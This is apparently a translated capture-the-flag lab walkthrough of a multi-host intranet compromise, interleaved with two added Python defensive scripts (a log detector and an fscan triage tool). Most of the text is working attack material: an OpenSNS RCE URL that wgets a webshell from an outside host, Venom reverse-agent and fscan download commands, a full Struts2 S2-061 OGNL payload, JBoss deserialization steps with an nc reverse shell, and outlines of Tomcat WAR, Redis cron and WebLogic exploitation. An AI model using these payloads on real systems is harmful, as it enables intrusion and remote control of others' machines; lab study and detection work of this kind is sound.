Range writeup, thanks to Nacl for providing it.
All CFS range environments are published in our Knowledge Planet community. There are 5 sets so far, available to try at any time, the environments never shut down, a new range is released every week, and the community has professionals to help you learn. Just join the community to get all of these services.
Now to the main topic.
Host discovery with fscan shows ports 82 and 7001 open. Start with 82.
This version of OpenSNS has a command-execution vulnerability. Payload:
/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)
Drop a webshell (rather than writing the shell with a write command, have the target download my one-liner shell remotely):
/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(%27wget%201.1.1.1:8081/1.php%27)
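From the defender's side, this request shape is easy to pick out of web server access logs. The following is an added example, not part of the writeup: it decodes the nested query parameter a second time, the way the framework does, and flags the runSchedule / _validationFieldItem / assert combination. The log lines are constructed; the first is built from the payload above, the second is a normal page request used as a negative case.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not from the writeup). The first carries the request shape
# shown above; the second is a normal OpenSNS page request used as a negative case.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id) HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?s=weibo/Share/shareBox&query=app=Weibo%26model=Index HTTP/1.1" 200 2048',
]

REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
# PHP callables that should never show up as a dynamic callback or its argument.
DANGEROUS = ("assert", "system(", "eval", "passthru", "shell_exec")

def inspect_request(target):
    """Decode the nested 'query' parameter once more, as the framework does, and return why it looks like the RCE chain."""
    outer = parse_qs(urlsplit(target).query)
    reasons = []
    for inner_raw in outer.get("query", []):
        inner = parse_qs(inner_raw, keep_blank_values=True)  # %26 became '&' after the first decode
        values = [v for vs in inner.values() for v in vs]
        if "runSchedule" in inner.get("method", []):
            reasons.append("Schedule.runSchedule reached through the nested query")
        if any(k.startswith("id[") for k in inner):
            if any("_validationFieldItem" in v for v in values):
                reasons.append("id[method] points at _validationFieldItem")
            if any(d in v.lower() for v in values for d in DANGEROUS):
                reasons.append("callback or argument contains a PHP code-execution function")
    return reasons

def scan_log(lines):
    """Return (client_ip, status, reasons) for every request the detector fires on."""
    hits = []
    for line in lines:
        m = REQ_RE.match(line)
        if m and (reasons := inspect_request(m.group(2))):
            hits.append((m.group(1), m.group(3), reasons))
    return hits
```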
After the download succeeds, connect with AntSword.
On the VPS:
python3 -m http.server 8081
./admin_linux_x64 -lport 8080
On the target:
wget 1.1.1.1:8081/a
./a -rhost 1.1.1.1 -rport 8080
Once that runs, start the SOCKS proxy from the Venom admin node.
Venom Admin Node Start...  { v1.1 author: Dlive }
(admin node) >>>
[+]Remote connection: ip:port
[+]A new node connect to admin node success
(admin node) >>> goto 1
node 1
(node 1) >>> socks 12345
a socks5 proxy of the target node has started up on the local port 12345.
With the proxy up, upload fscan and scan the internal network.
wget 1.1.1.1:8081/f
chmod +x f
./f -h 172.20.21.0/24
./f -h 10.6.10.0/24
Results:
172.20.21.85:8083 open
172.20.21.85:8009 open
172.20.21.52:8009 open
172.20.21.154:80 open
172.20.21.85:8080 open
172.20.21.52:8080 open
172.20.21.46:8080 open
172.20.21.135:6379 open
[*] WebTitle:http://172.20.21.85:8083 code:404 len:0 title:None
[+] Redis:172.20.21.135:6379 unauthorized
[+] Redis:172.20.21.135:6379 like can write /var/spool/cron/
[*] WebTitle:http://172.20.21.52:8080 code:200 len:20 title:Apache Tomcat/8.0.43
[*] WebTitle:http://172.20.21.46:8080 code:200 len:234 title:S2-059 demo
[*] WebTitle:http://172.20.21.85:8080 code:200 len:1554 title:Welcome to JBoss AS
[+] InfoScan:http://172.20.21.85:8080 [Jboss JBOSS]
[*] WebTitle:http://172.20.21.154 code:200 len:28 title:OpenSNS v5开源社群系统
[+] InfoScan:http://172.20.21.154 [ThinkPHP]
[+] http://172.20.21.52:8080/manager/html tomcat tomcat
[+] http://172.20.21.52:8080 poc-yaml-tomcat-manager-week
10.6.10.9:6379 open
10.6.10.8:80 open
[+] Redis:10.6.10.9:6379 unauthorized
[+] Redis:10.6.10.9:6379 like can write /var/spool/cron/
[*] WebTitle:http://10.6.10.8 code:200 len:28 title:OpenSNS v5开源社群系统
[+] InfoScan:http://10.6.10.8 [ThinkPHP]
Analysing the internal network information gives:
redis 10.6.10.9
redis 172.20.21.135
OpenSNS 172.20.21.154 10.6.10.8
S2-059 172.20.21.46:8080
JBoss 172.20.21.85:8080
tomcat 172.20.21.52:8080
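Turning raw fscan output into a prioritized remediation list, as an added example that is not from the writeup or from fscan itself: it parses the line formats shown above (open ports, WebTitle lines, [+] findings) and ranks the Redis cron-write, the unauthenticated services and the weak Tomcat manager credentials. The sample lines are a constructed subset of the output above and the severity rules are my own.

```python
import re
from collections import defaultdict
# Constructed sample in the fscan output format shown above (a subset, not the writeup's full result).
SAMPLE = """\
172.20.21.52:8080 open
172.20.21.135:6379 open
[*] WebTitle:http://172.20.21.52:8080 code:200 len:20 title:Apache Tomcat/8.0.43
[+] Redis:172.20.21.135:6379 unauthorized
[+] Redis:172.20.21.135:6379 like can write /var/spool/cron/
[*] WebTitle:http://172.20.21.154 code:200 len:28 title:OpenSNS v5
[+] http://172.20.21.52:8080/manager/html tomcat tomcat
[+] http://172.20.21.52:8080 poc-yaml-tomcat-manager-week
"""
IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
OPEN_RE = re.compile(rf"^{IP}:(\d+) open$")
TITLE_RE = re.compile(r"^\[\*\] WebTitle:(\S+) code:(\d+) len:\d+ title:(.*)$")
URL_RE = re.compile(rf"https?://{IP}(?::(\d+))?")
FINDING_RE = re.compile(r"^\[\+\] (.*)$")
# Triage rules (my own): (substring of a [+] line, severity, remediation a defender should apply).
RULES = [
    ("can write /var/spool/cron", "critical", "Redis can plant cron jobs: bind to localhost, set requirepass, rename CONFIG"),
    ("unauthorized", "high", "service accepts unauthenticated clients: enable auth and firewall the port"),
    ("/manager/html", "high", "Tomcat manager reachable with weak credentials: remove or restrict the manager app"),
    ("poc-yaml", "medium", "fscan PoC matched: verify manually and patch"),
]

def parse_fscan(text):
    """Group fscan lines by host: open ports, web titles per port, and [+] findings."""
    hosts = defaultdict(lambda: {"ports": set(), "titles": {}, "findings": []})
    for line in map(str.strip, text.splitlines()):
        if m := OPEN_RE.match(line):
            hosts[m.group(1)]["ports"].add(int(m.group(2)))
        elif m := TITLE_RE.match(line):
            u = URL_RE.match(m.group(1))
            hosts[u.group(1)]["titles"][int(u.group(2) or 80)] = m.group(3)  # no port means 80
        elif m := FINDING_RE.match(line):
            host = re.search(IP, m.group(1)).group(1)  # first IP on the finding line
            hosts[host]["findings"].append(m.group(1))
    return dict(hosts)

def triage(hosts):
    """Return [(severity, host, finding, action)] sorted from most to least severe."""
    rows = []
    for host, info in hosts.items():
        for finding in info["findings"]:
            for needle, sev, action in RULES:
                if needle in finding:
                    rows.append((sev, host, finding, action))
                    break
    return sorted(rows, key=lambda r: ({"critical": 0, "high": 1, "medium": 2}[r[0]], r[1]))
```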
It is unclear whether this Redis is one host or two, so leave it for last. First, S2-059.
The title says S2-059, but the S2-059 payload does not get through; the S2-061 payload is needed.
POST / HTTP/1.1
Host: 172.20.21.46:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 829
------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"
%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).
(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).
(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")
).(#bean.setBean(#stack)).(#context=#bean.get("context")).
(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).
(#bean.setBean(#macc)).
(#emptyset=#instancemanager.newInstance("java.util.HashSet")).
(#bean.put("excludedClasses",#emptyset)).
(#bean.put("excludedPackageNames",#emptyset)).
(#arglist=#instancemanager.newInstance("java.util.ArrayList")).
(#arglist.add("id")).
(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")
).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
Checking the IP shows no other NIC here, so move on to JBoss.
This one has CVE-2015-7501; look for an exploitation method.
git clone https://github.com/joaomatosf/JavaDeserH2HC
cd into the directory
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
After that finishes, run the second command:
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port
This produces a ReverseShellCommonsCollectionsHashMap.ser file; note that the ip and port here are the IP of the server the shell connects back to and the port it listens on.
Then start a listener with nc on the server:
nc -lvnp port
The server IP and listening port here are the ip and port from above.
proxychains curl http://172.20.21.85:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
Check the server: the reverse shell connected successfully.
Again only one NIC, so move on to Tomcat.
This version allows access to the manager; upload a WAR file to get a shell. WAR creation: zip the JSP webshell and change the extension to .war. Start with the weak password tomcat/tomcat.
Upload point
After a successful upload, check the response.
Connect with AntSword through the proxy.
Tomcat has two NICs; check whether the target can reach the internet.
The target has outbound access, so upload Venom and fscan the same way as before.
Configure SOCKS on the VPS.
Check the results.
Analysis
First attack the Joomla site. In this version the admin backend lets you edit PHP directly and drop a shell. Backend address:
Account/password: superadmin/123456. It has to be this account; admin does not work.
Go into the backend and edit the file under Templates; the file path:
Also only one NIC. Next, the Windows 6.1 host: ports 445 and 139 are open, so connect with an SMB client.
Switch to msf.
Exploitation fails at this point; after a search online, change two parameters.
Exploit again.
Exploitation succeeds. Still only one NIC, so what remains is Redis, MySQL, and WebLogic on port 7001.
MySQL first.
I tried every exploitation method on this database and none of them got through; in the end I asked our community's dedicated CFS support staff and was told this thing has no vulnerability.
Well then, Redis.
This is unauthorized access plus a cron job reverse shell. First listen on a port on the VPS.
Then use fscan directly to write the cron job for the reverse shell.
This IP address is the same one we scanned earlier, so only 7001 is left.
Although the page shows Not Found, the WebLogic vulnerability is still there. Use Liqun.
Run ip a, scan the target's internal network, and again upload fscan and Venom.
Check the results.
Analysis:
Tiki: database connection failed. The Tiki Wiki CMS Groupware authentication bypass (CVE-2020-15906) cannot be exploited, because it requires brute-forcing the admin password more than 60 times. PoC attached:
Finally, everyone is welcome to join our Knowledge Planet community; more news and content will be released there.